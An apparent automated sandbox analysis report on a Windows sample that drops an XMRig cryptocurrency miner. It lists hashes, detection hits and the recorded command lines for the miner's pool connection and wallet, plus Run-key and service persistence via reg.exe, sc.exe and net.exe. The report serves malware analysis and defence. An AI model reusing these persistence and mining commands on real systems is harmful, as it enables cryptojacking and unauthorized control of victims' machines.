Analysis
-
max time kernel
149s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
21-05-2024 16:08
Static task
static1
Behavioral task
behavioral1
Sample
63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe
-
Size
1.1MB
-
MD5
63e7b5139afc6a5d54bebf5a518b2daf
-
SHA1
8e4440701672ec7591f742de92e9748649ac156f
-
SHA256
26fd2c3c123d9a18ec4311f5a82bbe79a4190a89bce0e4d73e251f357484468f
-
SHA512
02ddcce9f5383a05c29b1bfb33e67379717bc08047228dc047c77c81796039a8702aa0b311eb253c4855f1910700412145d62cf2a2779ea0be88b833c020ed01
-
SSDEEP
24576:GHlsQzLKOu9Bh+p/Ps01E6TbBYGvZby9l14+eHnC2Dk6:GFsQzNuU/PLhTVY39liPC29
Malware Config
Signatures
-
XMRig Miner payload 14 IoCs
Processes:
resource yara_rule behavioral1/memory/2652-15-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-16-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-17-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-18-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-19-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-20-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-21-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-22-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-23-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-24-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-25-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-26-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-27-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig behavioral1/memory/2652-28-0x0000000000400000-0x00000000004E2000-memory.dmp xmrig -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 2 IoCs
Processes:
lasse.exekernel.exepid process 2208 lasse.exe 2652 kernel.exe -
Loads dropped DLL 3 IoCs
Processes:
63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exelasse.exepid process 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe 2208 lasse.exe -
Processes:
resource yara_rule \Windows\Temp\kernel.exe upx behavioral1/memory/2652-14-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-15-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-16-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-17-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-18-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-19-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-20-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-21-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-22-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-23-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-24-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-25-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-26-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-27-0x0000000000400000-0x00000000004E2000-memory.dmp upx behavioral1/memory/2652-28-0x0000000000400000-0x00000000004E2000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lasse = "C:\\Windows\\System32\\lasse.exe" reg.exe -
Drops file in System32 directory 1 IoCs
Processes:
63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exedescription ioc process File created C:\Windows\SysWOW64\lasse.exe 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 2908 sc.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exelasse.exepid process 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe 2208 lasse.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exekernel.exedescription pid process Token: SeDebugPrivilege 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe Token: SeLockMemoryPrivilege 2652 kernel.exe Token: SeLockMemoryPrivilege 2652 kernel.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
lasse.exepid process 2208 lasse.exe 2208 lasse.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exelasse.exedescription pid process target process PID 2380 wrote to memory of 2208 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe lasse.exe PID 2380 wrote to memory of 2208 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe lasse.exe PID 2380 wrote to memory of 2208 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe lasse.exe PID 2380 wrote to memory of 2208 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe lasse.exe PID 2380 wrote to memory of 2264 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe reg.exe PID 2380 wrote to memory of 2264 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe reg.exe PID 2380 wrote to memory of 2264 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe reg.exe PID 2380 wrote to memory of 2264 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe reg.exe PID 2380 wrote to memory of 2908 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe sc.exe PID 2380 wrote to memory of 2908 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe sc.exe PID 2380 wrote to memory of 2908 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe sc.exe PID 2380 wrote to memory of 2908 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe sc.exe PID 2380 wrote to memory of 3020 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe net.exe PID 2380 wrote to memory of 3020 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe net.exe PID 2380 wrote to memory of 3020 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe net.exe PID 2380 wrote to memory of 3020 2380 63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe net.exe PID 2208 wrote to memory of 2652 2208 lasse.exe kernel.exe PID 2208 wrote to memory of 2652 2208 lasse.exe kernel.exe PID 2208 wrote to memory of 2652 2208 lasse.exe kernel.exe PID 2208 wrote to memory of 2652 2208 lasse.exe kernel.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\lasse.exeC:\Windows\System32\lasse.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\Temp\kernel.exeC:\Windows\Temp\kernel.exe -a cryptonight -o pool.minexmr.com:5555 -u 47k5TbgFezTDNtJomYPgaDdk3dyQrHZvwYcnDSV6SnGCHGDP5UWMVFXFDBg25ekR5uTWjiETwQUukbQmmwDqAZ3A3aF4osR -p x -k --donate-level=1 -B3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lasse /t REG_SZ /d C:\Windows\System32\lasse.exe2⤵
- Adds Run key to start application
- Modifies registry key
PID:2264
-
-
C:\Windows\SysWOW64\sc.exesc.exe create lasse binPath= C:\Windows\System32\lasse.exe start= auto2⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\SysWOW64\net.exenet.exe start lasse2⤵PID:3020
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1012KB
MD56c8c1aa4ebcd402a607406fd2669e2c4
SHA15107b31ce5550182a8c6619326ac48b76bab8c16
SHA256b3e8da8d5569375929102215fe3159699d1dc570e0297dee954ffd4dc13d42ad
SHA5124753746873920506a9e2aefa1ee28cb9678699ab3512f573c0df2e552941b6383ccc4dedd64ae468fd6dad84710c2f92f589291e77d7b483c9e45d3e26a1709e
-
Filesize
358KB
MD57ecc53614c641d9d6de10bb9f6363b50
SHA19829a35418f5f921e3ba16fe3f7b72e7c0a8a9e4
SHA2569e5b3da1e5ece578ff99525d1ea565df458cdd62b305404336303ca8ca97f562
SHA51272372ae7dad200f2c45c1ebb133ebea0a068f060b1e77c7c603de4f4046f92ebe6e6c8b9d4efd4679b773d59f8eb1e601c3fe73abe03b56d762d400a26f719dc